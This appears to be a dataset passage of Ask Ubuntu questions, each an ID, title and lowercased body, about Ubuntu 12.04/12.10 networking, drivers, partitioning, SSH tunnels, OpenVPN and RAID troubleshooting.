239830	ubuntu 12.04 & 12.10 is not connecting to the ethernet port properly	i 'm using the reliance broadband connection which works fine on windows and linux mint ... but not in ubuntu . i 've tried it on both the 12.04 and 12.10 versions with the same result . the notification area says that the cable is connected and i am connected properly , the ip and mac addresses are all set to automatic , but i simply do n't get an uninterrupted internet connection . the thing thats bothering me the most is that i get connections for a few minutes only at a go ! i am browsing the internet and then suddenly , the browser ( firefox ) says that it ca n't find the server ! then after reloading continuously for ten minutes , it can browse again for five minutes and the same problem arises ! the strangest thing is that my downloads on firefox or my torrents or my skype calls do n't face these connection errors ! ! ! i can see that my download is going on at my maximum alloted speed but i ca n't load a single web page ! ! ! please help me solve this problem . oh ! one more thing i wanted to add ... the same ethernet port and cable went completely undetected in 10.10 ... i do n't have it now so i do n't need it now , but i really need a fix for the 12.04/12.10 versions .
239832	unable to create partition to install ubuntu	unable to install ubuntu in the 'unusable ' space to create partition for ubuntu , how can i install ubuntu .
239838	is it possible for conky to display time in words and not in numbers ?	i want to have conky display the time using words and not numbers . what i want to do is more or less how the pebble watch looks ( red watch ) . like in the image , even if only the time and not the date can be shown . is this possible ?
239843	moving home/user directory to another drive ?	i 'm installing a ssd and to save space i want to move my user folder to another drive , is there a way to do that ?
239847	installing ubuntu on an old pc	i have recently received a new pc and would like to install ubuntu on my old one . can i simply install it and write over the old hard drive , or do i need to do something special ?
239854	how to install ubuntu with usb stick while using ubuntu 9.04 as current opperating system ? what program do i use to open the download ?	i am currently running a really old version of ubuntu 9.04 on my computer . i would like to upgrade to the new 12.10 using a usb stick but i ca n't figure out how to run the installation process . i am used to windows and have never used ubuntu . what program should i use to i open the download ? any help will be appreciated ! thanks !
239856	mounting yaffs2 filesystem on ubuntu 11.10	i want to mount a yaffs2 partition on my system . the kernel version is 3.0.16 , which does not support yaffs2 . so i downloaded and built it . copied the .ko file to /lib/modules/ ... /fs/yaffs2/yaffs.ko and restarted.. but the mount command still returned `` mount : unknown filesystem yaffs '' how can i make it recognise the filesystem and mount it so i can access it from file explorer.. ?
239859	installing ubuntu and windows on same drive	i 'd like to install ubuntu os on my dell laptop using windows installer . the windows version i 'm using is windows 7 home . at the moment there is only one drive on the laptop , c , so the windows files are located on this drive . i wonder whether instaliing ubuntu on the same drive would cause any problems . any advice and opinion would be helpful , thanks in advance
239871	how to make an ubuntu installation on external hdd boot on any system ?	when installing ubuntu 12.04 to an external hdd using ubiquity , it installs grub2 to that hdd . such installation works fine on the machine on which it was created , but on any other machine everything just hangs up after loading the initial ramdisk . the machine shows black screen and no disk activity goes on . i suspect this is caused by some configs being dependent on `` global '' device enumeration which is different on different machines , or something else gets machine-dependent . how do i avoid that ? shall i generate a more generic initial ramdisk somehow ? or perhaps using syslinux instead of grub2 will help ?
239873	why is cpu usage higher in windows 7 after installing ubuntu 12.04 via windows installer ?	for normal usage , cpu consumption is above 80 % for windows 7 . this happened only after installing ubuntu 12.04 via windows installer . why is it so ?
239874	choose vga output on port replicator	i have an acer laptop with a port replicator , the easyport iv . system specs : acer laptop , travelmate 8172 intel hd graphics ubuntu 12.10 my problem : i have two vga ports . one directly on my laptop and one on my easyport of course . most of the times i am forced to use the vga socket on my laptop , which somehow defeats the purpose of a having port replicator . xrandr -q does n't list it as a different device of course . also i do n't get a udev signal . sometimes , on rare occasions it will mystically pick the vga on my easyport , but i ca n't trigger that . how can i choose the vga output on my port replicator ?
239877	macbook 8,1 ubuntu 12.10 cpu heat	installed ubuntu on another partition on my macbook , which works well sorted the wifi but the problem is that the heat coming off the thing is mental . the fans are going to cool it , and i have installed macfanctl which seems to have helped a little but its still way to hot for idle . i have managed to boot with efi yet going to try and sort that but , is that the only factor ? any help with this would be great really want to move from osx to ubuntu but this will just not work with the heat . i have heard that if i boot with efi then the graphics switching will work which would be great so im going to try and get that working , but the cpu heat is still a issue . thanks
239878	unmet dependencies - what to do ?	reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : mplayer : depends : libavcodec52 ( > = 4:0.5.1-1 ) but it is not installable or libavcodec-extra-52 ( > = 4:0.5.1-1 ) but it is not installable depends : libavformat52 ( > = 4:0.5.1-1 ) but it is not installable or libavformat-extra-52 ( > = 4:0.5.1-1 ) but it is not installable depends : libjack0 ( > = 0.118+svn3796 ) but it is not installed depends : libjpeg62 but it is not installed depends : liblzo2-2 but it is not installed depends : libmpcdec3 but it is not installable depends : libx264-85 but it is not installable recommends : apport-hooks-medibuntu but it is not installable e : unmet dependencies . try using -f .
239881	the compatibility of android and ubuntu mobile sw	android uses bionic but ubuntu uses glibc . how do they keep the compatibility in ubuntu for android ? does ubuntu for android use bionic ? or it gives up android ndk compatibility ?
239889	vmware 9.0 - ubuntu screen problem	i have installed ubuntu 12.4 on vmware workstation , but i 'm not getting display , i mean there is something strange for me . i can access the terminal when i press ctrl+t but i ca n't see the icons and left side menu bar . check it out the screenshot can anyone tell me how to fix this issue please ? thanks ! !
239890	ssh google 2 step verification process over nautilius	i do not know how to set connection for server with ssh google 2 step verification process over nautilius ? i have ubuntu 12.10 . over terminal goes great with 2 step ver . also works great over filezilla ( but it bothers me that each file i upload or download ask for password and its little tiresome on google after exchanging 10 files ) , but i do want to connect over nautilius , i go file > > connect to server > > ssh i set all parameters and connect it does n't prompt me code for google 2 step verification it just boot me from server . does anybody know how to connect and where on client and/or server ? thanks ; )
239891	opencv program wo n't compile ( quantal )	i am trying to compile a simple program using opencv in ubuntu quantal . i have installed all the opencv packages available . my code is the following # include < stdio.h > # include < highgui.h > # include < cv.h > int main ( int argc , char *argv [ ] ) { iplimage* img=0 ; /* pointer to an image */ printf ( `` hello\n '' ) ; if ( argv [ 1 ] ! = 0 ) img = cvloadimage ( argv [ 1 ] , 0 ) ; // 1 for color else printf ( `` enter filename\n '' ) ; if ( img ! = 0 ) { cvnamedwindow ( `` display '' , cv_window_autosize ) ; // create a window cvshowimage ( `` display '' , img ) ; // show image in window cvwaitkey ( 0 ) ; // wait until user hits a key cvdestroywindow ( `` display '' ) ; } else printf ( `` file not found\n '' ) ; return 0 ; } and my compile command is g++ -i/usr/include/opencv -lopencv_core -lopencv_imgproc -lopencv_highgui -lopencv_ml -lopencv_video -lopencv_features2d -lopencv_calib3d -lopencv_objdetect -lopencv_contrib -lopencv_legacy -lopencv_flann main.cpp -o main and i get the following errors /tmp/ccuq4tm4.o : in function `main ' : main.cpp : ( .text+0x45 ) : undefined reference to `cvloadimage' main.cpp : ( .text+0x6b ) : undefined reference to `cvnamedwindow' main.cpp : ( .text+0x7c ) : undefined reference to `cvshowimage' main.cpp : ( .text+0x86 ) : undefined reference to `cvwaitkey' main.cpp : ( .text+0x90 ) : undefined reference to `cvdestroywindow' collect2 : ld returned 1 exit status make : *** [ all ] error 1 what i understand from the errors above is that there is no problem finding the library but the compiler can not find the functions inside it . can you please help me out with that ?
239892	how to install virtualbox ?	i am new to ubuntu and i want to install virtualbox in ubuntu through terminal . can you guys please provide me the command to install it ?
239894	is possible to cipher keys in the .juju/environments.yaml file ?	is possible to have a ~/.juju/environments.yaml file like this ? : environments : sample : type : ec2 access-key : $ ( cat access-key ) secret-key : $ ( cat secret-key ) control-bucket : juju-8b53699f85c0438c96897ce75f633aa1 admin-secret : 9a7c512f938f4bafb96365d7ceaf569b default-series : precise ssl-hostname-verification : true i 'd like to get those keys from gpg output or something which let me cipher them , so i can put the file on internet and nobody could be able to use my ec2 account .
239895	openvpn struggling	i 've got some problems with my openvpn setup . the setup : - > ubuntu server 12.04 - > two active nic 's : eth0 ( default ) : 192.168.1.0/24 eth1 : x.x.x.x ( external ip ) i 've managed to get the routing to work so i can connect to the outside world with the eth1 nic . holmen @ filserver : ~ $ ping -i eth1 -c 3 www.linuxquestions.org ping www.linuxquestions.org ( 75.126.162.205 ) from 192.168.1.2 eth1 : 56 ( 84 ) bytes of data . 64 bytes from www.linuxquestions.org ( 75.126.162.205 ) : icmp_req=1 ttl=50 time=133 ms 64 bytes from www.linuxquestions.org ( 75.126.162.205 ) : icmp_req=2 ttl=50 time=133 ms 64 bytes from www.linuxquestions.org ( 75.126.162.205 ) : icmp_req=3 ttl=50 time=133 ms -- - www.linuxquestions.org ping statistics -- - 3 packets transmitted , 3 received , 0 % packet loss , time 2002ms rtt min/avg/max/mdev = 133.281/133.336/133.379/0.423 ms one curious thing is that the `` from ip # '' . it says `` from 192.168.1.2 eth1 '' but that ip is the servers ip on the eth0 iface . netstat : holmen @ filserver : ~ $ netstat -anr kernel ip routing table destination gateway genmask flags mss window irtt iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 x.x.x.x 0.0.0.0 255.255.128.0 u 0 0 0 eth1 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 but here comes the real problem : when setting up openvpn with the option `` local x.x.x.x ( eth1 ext ip ) '' it still tunnels the eth0 interface . and i cant understand why . openvpn settings : client dev tap proto udp local x.x.x.x remote openvpn.anonine.net 1194 remote openvpn.anonine.net 1195 remote openvpn-2.anonine.net 1196 remote openvpn-2.anonine.net 1197 remote openvpn-3.anonine.net 1198 remote openvpn-3.anonine.net 1199 remote openvpn-4.anonine.net 1200 remote openvpn-4.anonine.net 1201 remote-random resolv-retry infinite auth-user-pass persist-key persist-tun ca anonine.ca.crt ns-cert-type server comp-lzo reneg-sec 0 verb 3 netstat ( tunnel active ) : holmen @ filserver : ~ $ netstat -anr kernel ip routing table destination gateway genmask flags mss window irtt iface 0.0.0.0 46.246.20.129 128.0.0.0 ug 0 0 0 tap0 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 x.x.x.x 0.0.0.0 255.255.128.0 u 0 0 0 eth1 46.246.20.128 0.0.0.0 255.255.255.128 u 0 0 0 tap0 80.67.8.222 192.168.1.1 255.255.255.255 ugh 0 0 0 eth0 128.0.0.0 46.246.20.129 128.0.0.0 ug 0 0 0 tap0 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 anyone got any ideas ?
239896	install toshiba e-studio 455 on 12.10	i am using ubuntu 12.10 . i want to install network printer toshiba e-studio 455 , but in driver database there are only entries for 450 , 450s , 451c , 452 and 453 . when i used driver for 450 and tried to print test page , printer printed page with following context : error : invalidfont offending command : $ definefont stack : -- nostringval -- /tvzywm+ubuntu-medium -- nostringval -- /tvzywm+ubuntu-medium -- nostringval -- -- nostringval -- 14 how can i install this printer to work properly or from where can i download a correct driver ?
239901	how can i fix my dell laptop 's wireless connection ?	i 've just installed ubuntu on my dell laptop , and the wireless is not working . how could i fix it ? is there any driver i should install ? note : i 'm also running windows 7 on the same laptop and the wireless connection works just fine . any suggestion would be helpful . thanks ! edit : wifi card model description : vendor : broadcom corporation product : bcm4312 802.11b/g lp -phy version : 01 configuration : driver = b43 -pci-bridge latency=0
239902	how can i deactivate the webcam led on a asus eee pc netbook 1001pxd ?	on my asus eee pc netbook 1001pxd my webcam has a little blue led . when i am working this is disturbing . how can i switch this webcam led of on my netbook ?
239904	shaky wireless with asus pci-n10	it worked out of the box in my other pc and it did work during install but right now , sometimes it works fine and sometimes the connection is awefully slow even though reception is really good and i ca n't do anything that requires an internet connection . no additional driver suggested . is there any tests i can run ?
239906	how to install threadsafe version of mysqldb for python in ubuntu 12.04 ?	ubuntu 12.04 , 64 bit version . mysql-client , mysql-server , libmysqlclient-dev all are installed . but libmysqlclient_r.so was not present in this path : dhruvpathak @ dhruvpathak : /usr/lib/x86_64-linux-gnu $ ll *mysql* -rw-r -- r -- 1 root root 5075482 aug 5 22:53 libmysqlclient.a lrwxrwxrwx 1 root root 20 aug 5 22:53 libmysqlclient.so - > libmysqlclient.so.18 lrwxrwxrwx 1 root root 24 aug 5 22:53 libmysqlclient.so.18 - > libmysqlclient.so.18.0.0 -rw-r -- r -- 1 root root 3806568 aug 5 22:53 libmysqlclient.so.18.0.0 while installing mysqldb-python through pip , i kept on encountering this error : /usr/include/python2.7/pyconfig.h:890:0 : note : this is the location of the previous definition gcc -pthread -shared -wl , -o1 -wl , -bsymbolic-functions -wl , -bsymbolic-functions -wl , -z , relro build/temp.linux-x86_64-2.7/_mysql.o -l/usr/lib/x86_64-linux-gnu -lmysqlclient_r -lpthread -lz -lm -lrt -ldl -o build/lib.linux-x86_64-2.7/_mysql.so /usr/bin/ld : can not find -lmysqlclient_r as you can see , directory path was correct /usr/lib/x86_64-linux-gnu but thread safe version of file libmysqlclient_r.so was not present . though i was able to install mysql-python by setting threadsafe = false in site.cfg . how can i install it with threadsafe = true , and get libmysqlclient_r.so file in my mysql installation ?
239907	reverse ssh tunnel issue	i 'm working on setting up an unattended ubuntu pc with ubuntu server 12.04 minimal , and since this pc will be placed in a remote location with no keyboard or screen ( unattended ) , i need to have a permanent ssh connection from this machine to a middle-server ( between itself and me ) - reason being , this pc will be behind a nat firewall . i followed dot-to-dot instructions at http : //wiki.fabelier.org/index.php ? title=permanent_reverse_ssh_tunneling but when i connect , i just get an error quote : ssh : connect to host 5.175.145.251 port 19999 : connection refused so i went back googling for a solution and found http : //www.alexonlinux.com/reverse-ssh-tunnel-or-connecting-to-computer-behind-nat-router surprisingly , alexonlinux 's solution worked out-of-the-box . seeing this , i tried the previous method , this time using port 6333 , but no luck . then i tried alexonlinux 's method using port 19999 and again it works fine . the reason i ca n't stick to alexonlinux 's solution is , that it requires some commands to be entered on the pc behind the nat , and that 's not possible in my case . i really wonder what could be stopping the connection when using fabelier 's method . maybe the script is not loading ? i did try manually running the script but still no luck . i have also set gatewayports yes on the pc behind the nat . for the record , here 's the script i 've used from fabalier 's method : a=`ps -ef | grep 19999 | grep -v grep` if [ ! `` $ a '' ] ; then ssh -fn -r 19999 : localhost:22 < middle-usename > @ < middle-hostname > fi ( obviously i 've changed the @ to the necessary ) i had to change the first line as brackets were not acceptable . would really appreciate some help on this , pls .
239911	slow file transfers through gigabit switch	i 'm having problems with real slow file transfers across a network . i have 2 pc 's running windows 7 and an ubuntu server attached to a netgear gigabit switch ( gs605 ) which is linked to a bt home hub router . when the ubuntu server is plugged into the switch i get real slow speeds for file transfers from windows pcs to the ubuntu server of about 150kb/sec . if i unplug the servers cable from the switch and plug it into the bt home hub and do a file transfer it will work at a rate of about 10mb/sec . from windows to windows pc it seems a lot faster through the switch , over 25mb/sec . has anyone got any idea why the ubuntu server is so slow when attached to the switch and what i can look at to fix it . all the lights show as yellow on the switch to signify 1gbps connection and the server has a new cat 6 , 3m long cable .
239912	how to get wide character fonts on kde ?	i have to help a person , using kde 4.9.3 , and i 'm not an expert on kde . he has not a good sight , so i grew up the character fonts on the system ( from the kde configuration tool ) , so he is satisfied for the appearance of dolphin or the desktop . but what 's about gimp , libreoffice or firefox , the character fonts still undersized ! is there a way to correct that ?
239918	ubuntu 12.04 nomodeset fixes boot problem but causes screen resolution to get stuck	i 've been searching the askubuntu forum for the past 3 days trying to figure out what 's going on with my system and i have tried a lot of things but to no avail . so , i will explain my situation and tell you what i have tried and i hope someone can help me : ) i have an : hp workstation xw4100 pentium ( r ) 4 3.00 ghz 1.5 gb ram nvidia quadro4 380 xgl graphics card it came with windows xp and i set it up ( with wubi ) to dual boot with ubuntu 12.04 after installation i had the problem that so many people had with it booting to a black screen ( mine was actually booting to the terminal basic shell ) that is fixed by adding nomodeset into the grub . when i do that , my screen resolution becomes stuck in 1280x768 ( as opposed to 1366x768 before adding nomodeset ) ( and also , when running xp the best resolution is 1280x720 ) when i go to `` additional drivers '' it does n't show any proprietary drivers , so i manually downloaded them using this command : sudo apt-add-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current but after rebooting , that made the graphics even worse ( now stuck as 800x600 ) so i tried to configure the drivers with sudo nvidia-xconfig but that simply created an empty xorg.config file . i found one place where a guy gave information to manually input into the xorg.config file but that had no effect at all . lastly i tried to install previous versions of the nvidia drivers , but they would n't even fully install . so now i have just re-installed ubuntu 12.04 and i either need to find a better solution to the first problem ( nomodeset ) or get the nouveau driver to correctly configure to work with my nvidia graphics . thanks for your help ahead of time !
239919	completely remove nm-applet from gnome-shell	i have installed ubuntu gnome remix 12.10 . i have uninstalled network-manager , network-manager-gnome , etc ... but in gnome-shell top bar panel remains the applet without icon : how can i completely remove nm-applet from gnome-shell ?
239921	why can i not access imgur.com and gravatar.com from ubuntu but can do so from windows ?	i have this strange problem , i am unable to access imgur.com from ubuntu ! i have checked the /etc/hosts file , there seems to no entry related to imgur . i can access it from windows ( same connection ) . i can not ping it or traceroute it , i can not even ping the ip of imgur . i have cleared iptables too , what could be the cause ? i can not access gravatar.com too ! ! i just noticed that sorry . running host imgur.com ( the same output with google 's dns servers ) gowtham @ gowtham-hacktohell : ~ $ host imgur.com imgur.com has address 23.23.110.58 imgur.com has address 23.23.110.81 imgur.com has address 54.243.128.92 imgur.com mail is handled by 5 alt1.aspmx.l.google.com . imgur.com mail is handled by 1 aspmx.l.google.com . imgur.com mail is handled by 10 aspmx2.googlemail.com . imgur.com mail is handled by 5 alt2.aspmx.l.google.com . imgur.com mail is handled by 10 aspmx3.googlemail.com . running tcptraceroute gowtham @ gowtham-hacktohell : ~ $ tcptraceroute imgur.com selected device ppp0 , address 117.199.141.54 , port 44995 for outgoing packets tracing the path to imgur.com ( 54.243.128.92 ) on tcp port 80 ( http ) , 30 hops max 1 117.199.128.1 17.534 ms 17.764 ms 17.896 ms 2 218.248.171.102 93.272 ms 26.393 ms 109.985 ms 3 115.114.130.49.static-chennai.vsnl.net.in ( 115.114.130.49 ) 49.442 ms 47.180 ms 46.981 ms 4 * * * 5 ix-0-100.tcore2.mlv-mumbai.as6453.net ( 180.87.39.25 ) 70.085 ms 69.712 ms 70.361 ms 6 if-2-2.tcore1.mlv-mumbai.as6453.net ( 180.87.38.1 ) 186.862 ms 186.434 ms 185.515 ms 7 if-9-5.tcore1.wyn-marseille.as6453.net ( 80.231.217.17 ) 181.965 ms 182.963 ms 184.682 ms 8 if-8-1600.tcore1.pye-paris.as6453.net ( 80.231.217.6 ) 186.152 ms 184.483 ms 182.950 ms 9 if-12-2.tcore1.pvu-paris.as6453.net ( 80.231.154.70 ) 191.271 ms 189.655 ms 188.606 ms 10 if-3-2.tcore1.fr0-frankfurt.as6453.net ( 80.231.153.54 ) 187.245 ms 186.013 ms 193.808 ms 11 xe-0-1-0-6.r02.frnkge03.de.bb.gin.ntt.net ( 129.250.9.57 ) 288.412 ms 281.124 ms 281.011 ms 12 ae-2.r20.frnkge04.de.bb.gin.ntt.net ( 129.250.5.217 ) 352.432 ms 357.071 ms 357.256 ms 13 ae-1.r21.asbnva02.us.bb.gin.ntt.net ( 129.250.3.20 ) 391.405 ms 394.961 ms 391.812 ms 14 ae-2.r00.asbnva02.us.bb.gin.ntt.net ( 129.250.3.114 ) 378.128 ms 381.786 ms 385.697 ms 15 ae-4.amazon.asbnva02.us.bb.gin.ntt.net ( 168.143.232.50 ) 370.938 ms 353.306 ms 351.793 ms 16 72.21.220.55 361.004 ms * 364.525 ms 17 205.251.245.55 368.187 ms 380.907 ms 375.333 ms 18 * * * 19 * * * 20 * * * i dial the connection using ppoe . capturing the stream through wireshark , i see this running curl gowtham @ gowtham-hacktohell : ~ $ curl -i http : //imgur.com http/1.1 200 ok server : nginx date : fri , 11 jan 2013 12:24:01 gmt content-type : text/html connection : keep-alive cache-control : max-age=5 , s-maxage=5 , must-revalidate x-cached : expired and telnetting , gowtham @ gowtham-hacktohell : ~ $ telnet imgur.com 80 trying 23.23.110.58 ... connected to imgur.com . escape character is '^ ] ' . head / http/1.0 http/1.1 200 ok server : nginx date : fri , 11 jan 2013 12:25:11 gmt content-type : text/html connection : close cache-control : max-age=5 , s-maxage=5 , must-revalidate x-cached : hit connection closed by foreign host .
239923	shell script to -9 kill based on name	is there a way ( perhaps a script ) how to automate this process : petr @ sova : ~ $ ps -ef | grep middleman petr 18445 2312 1 12:06 pts/2 00:00:01 /home/petr/.rvm/gems/ruby-1.9.3-p362/bin/middleman petr 18581 13621 0 12:08 pts/0 00:00:00 grep -- color=auto middleman petr @ sova : ~ $ kill -9 18445 unfortunately , pkill is too weak as i have to go with -9 option on kill .
239927	# ! /usr/bin/php sometimes not working on 12.10 server	i 've recently moved some working code from a 12.04 server to a 12.1 server . everything working well except ... . some of my scripts include # ! /usr/bin/php -q at the top so i can run them from the command line without explicitly invoking php/ . some of these work find , some others do not work at all - i get the error message : exception : zend extension ./maketracks.php does not exist there is a correct link from /usr/bin/php to etc/alternatives/php and then on to /usr/bin/php5 i do n't know if something changed between 12.04 and 12.10 that is causing this or what else might cause it . i 'm stumped . any thoughts or suggestions appreciated
239929	which version of ubuntu would run the best ?	i have an old computer and i wanted to know which version of ubuntu os would run the best on it . my conputer stats : 1.5gb ram ati radeon 9200 ( 128mb ) amd sempron 2300+ ( 1.58ghz ) 80gb hdd
239935	unable to install ubuntu12.10 on dell inspiron 14z ultrabook ?	i am unable to install ubuntu12.10 on my dell inspiron 14z ultrabook ? ? when i tried , it is saying something like `` root directory not defined ''
239937	ctrl+alt+t random terminal opens	when i need to open a terminal i press ctrl+alt+t to save time . most of the time absolutely nothing happens , i try to press same combination again , and still nothing happens . after like 5-8 tries terminal window finally appears . sometimes terminal opens on a first try . this is a very annoying situation . i also noted that open rate increases when i click on random spot on my desktop when all windows are hidden . also , when terminal finally is open , next ctrl+alt+t combinations open new terminal window immediately . there are no loadings when combination does not work , which means terminal will not appear even if i wait . ubuntu 12.10 current computer : asus p5k-e/wifi-ap mb , cpu q6600 quad core @ 2.4ghz , gfx gtx560ti , ddr2 ram @ 800mhz 4gb what am i doing wrong ? maybe there is some `` focus '' in shortkeys , global shortkeys , etc ?
239938	how can i play video file with .vmw extension ?	i tried vlc and mplayer , but both failed to play video file with .vmw extension . i have given the following message required plugin could not be found python ( v2.7 ) requires to install plugins to play media files of the following type : video/x-asf-unknown decoder
239939	about bumblebee 12.10	im using ubuntu 12.10 64bit and installed bumblebee with the way in wiki . when i try to run programs with optirun i get this error . [ 3143.700713 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) nvidia ( 0 ) : failed to initialize the nvidia gpu at pci:1:0:0 . [ 3143.700755 ] [ error ] aborting because fallback start is disabled . how can i fix it and use my nvidia gt555m as a main graphic card ? thanks for reading .
239941	remove domain user access to ubuntu machine	i have configured my ubuntu server to allow login using windows ad credentials . i have added enabled a domain group to login to ubuntu machine ( by adding them in sudoer file ) # % mydomain\\domain^users all= ( all ) all now i want to remove the login access of these group members to the machine . i tried modifying sudoer ( removed # % mydomain\\domain^users all= ( all ) all ) but still the users of that group is able to login . how can i remove the access .
239946	is there any driver available for radeon xpress 200 ( m ) ?	i have a problem with my graphic card radeon xpress 200 ( m ) on ubuntu 12.10 . as far as i know , there is n't any driver which would support this card any more . so i will appreciate if any of you can help me find a driver for it . i have already read a similar question about this card and none of them helped me to solve this problem .
239949	show a notification at login using pam_exec	this simple script will show a zenity notification when the user logs in : case `` $ pam_type '' in 'open_session ' ) if [ `` $ pam_service '' = `` lightdm '' ] ; then display=:0 sudo -u $ pam_user notify-send `` hello there ! '' `` hello '' else echo `` hello there ! '' fi ; ; esac however , this will only work if the display variable is actually 0 . and wo n't work for terminal or remote ( ssh ) logins ( obviously , the echo there seems to go nowhere ) . what can i do about this ? i need a way to : get the current display variable from the pam_exec environment , if i 'm using a graphical login interface get the current console device , or anywhere where i can send a message to the correct console , if i 'm using a console interface .
239952	ubuntu 12.04 lts stopped detecting bcm4312 on dell e6500	i have been using wireless seamlessly since i upgraded to ubuntu 12.04 lts . i did a botched attempt of installing octave 3.6 , at that time i was connected via ethernet . i postponed that installation till later , but when i went home and tried to connect to a wireless network realized that ubuntu is not detecting the wireless adapter..the blue light did not come up even after toggling hardware key . on booting into windows os i was able to confirm that the adopter is working and i could connect to wireless network . since then i have tried a number of things including re-installing bcm drivers as mentioned on other threads but nothing worked . here is the current status of my machine and wireless adapter ... . lspci -v 0c:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) subsystem : dell wireless 1397 wlan mini-card flags : bus master , fast devsel , latency 0 , irq 3 memory at f69fc000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel modules : ssb lsmod module size used by ip6table_filter 12815 0 ip6_tables 27864 1 ip6table_filter iptable_filter 12810 0 ip_tables 27473 1 iptable_filter x_tables 29891 4 ip6table_filter , ip6_tables , iptable_filter , ip_tables vesafb 13844 1 parport_pc 32866 0 ppdev 17113 0 rfcomm 42651 0 lp 17799 0 parport 46562 3 parport_pc , ppdev , lp bnep 18139 2 joydev 17693 0 bluetooth 205289 10 rfcomm , bnep binfmt_misc 17540 1 nfsd 277884 2 nfs 356377 0 lockd 90326 2 nfsd , nfs fscache 61568 1 nfs auth_rpcgss 53380 2 nfsd , nfs nfs_acl 12883 2 nfsd , nfs sunrpc 241772 6 nfsd , nfs , lockd , auth_rpcgss , nfs_acl psmouse 97485 0 serio_raw 13211 0 video 19596 0 compat 20099 3 rfcomm , bnep , bluetooth e1000e 156715 0 lshw -c network *-network unclaimed description : network controller product : bcm4312 802.11b/g lp-phy vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0c:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f69fc000-f69fffff uname -a linux ubuntu 3.2.0-35-virtual # 55-ubuntu smp wed dec 5 18:02:05 utc 2012 x86_64 x86_64 x86_64 gnu/linux sudo modprobe wl fatal : module wl not found . thanks in advance for any help . update after trying the answer below : fsheikh @ ubuntu : ~ $ sudo apt-get remove -- purge bcmwl-kernel-source reading package lists ... done building dependency tree reading state information ... done package bcmwl-kernel-source is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . fsheikh @ ubuntu : ~ $ sudo apt-get install firmware-b43-lpphy-installer reading package lists ... done building dependency tree reading state information ... done firmware-b43-lpphy-installer is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . fsheikh @ ubuntu : ~ $ sudo modprobe b43 warning : error inserting bcma ( /lib/modules/3.2.0-35-virtual/updates/cw-3.6 /bcma.ko ) : unknown symbol in module , or unknown parameter ( see dmesg ) warning : error inserting cfg80211 ( /lib/modules/3.2.0-35-virtual/updates/cw-3.6/cfg80211.ko ) : unknown symbol in module , or unknown parameter ( see dmesg ) warning : error inserting mac80211 ( /lib/modules/3.2.0-35-virtual/updates/cw-3.6/mac80211.ko ) : unknown symbol in module , or unknown parameter ( see dmesg ) fatal : error inserting b43 ( /lib/modules/3.2.0-35-virtual/updates/cw-3.6/b43.ko ) : unknown symbol in module , or unknown parameter ( see dmesg )
239957	can not boot ubuntu 11.04 live cd on hp workstation z820 ( uefi )	i have an hp workstation z820 . i would like to install ubuntu 11.04 on it , but i can not boot the live cd . there is an ssd and hhd on the machine , but no operating systems are installed on it . system has uefi architecture , and on the bios , cd/dvd drive appears under both uefi boot sources and legacy boot sources .
239958	how to boost mplayer ( smplayer ) sound ( in lubuntu ) ?	i am thinking of the useful feature present in the mpui video player ( mplayer for windows ) that can enable volume boost to impressive levels ( not from the volume slider , but just from the mouse scroll ) . in l/ubuntu i use vlc for the same purpose - normally up to 200 % . i have found this and this related questions that imply overall volume boost and do not specify the desktop environment , which usually means they are gnome-unity specific . i think the answers related to using the volume properties in order to boost overall volume above 100 % is useful in lxde/lubuntu too , as pulseaudio volume control can be used in lxde . but i would like to know if there 's a way to do that with mplayer/smplayer - to get more boost . i thought that maybe mplayer would do in ubuntu/lubuntu at least what it can do in windows . but how ?
239966	move home directory to another directory in ubuntu 12.04	i want to move my present home directory to another directory in my virtual-box ubuntu 12.04 distro . here is what i want : right now my present home directory is located at /home/jhon . but i want to change it to /home/users/jhon how do i do that ? so that when i type $ home , it should point to /home/users/jhon
239967	accidentally partitioned drive from mbr to guid	[ solved ] thanks everybody , the mbr schema now is restored via testdisk , and thanks to the author for this piece of software . i wanted to format only my data ( ntfs ) partition for a fresh start . but i ended up partitioning my whole disk from mbr to guid structure and now all my partitions are gone . i had a ubuntu/windows setup with mbr structure and lots of partitions and few of them where truecrypt partitions . please help , i am in huge trouble , lost all my wedding pictures , account logins . can i get my data back ? sorry if already answered , but i am kinda lost right now and i apologize .
239972	how do i fix `` mdadm : /dev/sdc1 not large enough to join array '' for three identical discs ?	after uppgrading to ubuntu 12.04 lts in my server grub started to complain and give errors about my raid array , everything still seems to be working but it is a bit unnerving to have grub giving errors . setting up grub-pc ( 1.99-21ubuntu3.7 ) ... error : found two disks with the index 2 for raid md0 . error : superfluous raid member ( 3 found ) . i 'm getting a lot of these errors when grub is updated . facts are : i have three identical discs in a raid5 set up , on two of the discs there is one primary partition which is added to the array but the third disk is added without a primary partition . ie . mdam -- manage /dev/md_d0 -- add /dev/sdc i 'm guessing that this is the reason for grub complaining . since discovering this problem i have disabled the disc that is missing a primary partition , created a primary partition , verified that it looks the same with cfdisk /dev/xxx and then print partition table . and tried to add the new partition to the raid array and that is when i get the message that the partition is to small to be added to the raid array . > sudo mdadm /dev/md_d0 -- add /dev/sdc1 mdadm : /dev/sdc1 not large enough to join array the partition tables all look the same , partition table for /dev/sdc first last # type sector sector offset length filesystem type ( id ) flag -- -- -- -- - -- -- -- -- -- - -- -- -- -- -- - -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- -- -- -- -- pri/log 0 2047* 0 # 2048*free space none 1 primary 2048* 3907029167* 0 3907027120*linux raid auto ( fd ) none partition table for /dev/sdd first last # type sector sector offset length filesystem type ( id ) flag -- -- -- -- - -- -- -- -- -- - -- -- -- -- -- - -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- -- -- -- -- pri/log 0 2047* 0 # 2048*free space none 1 primary 2048* 3907029167* 0 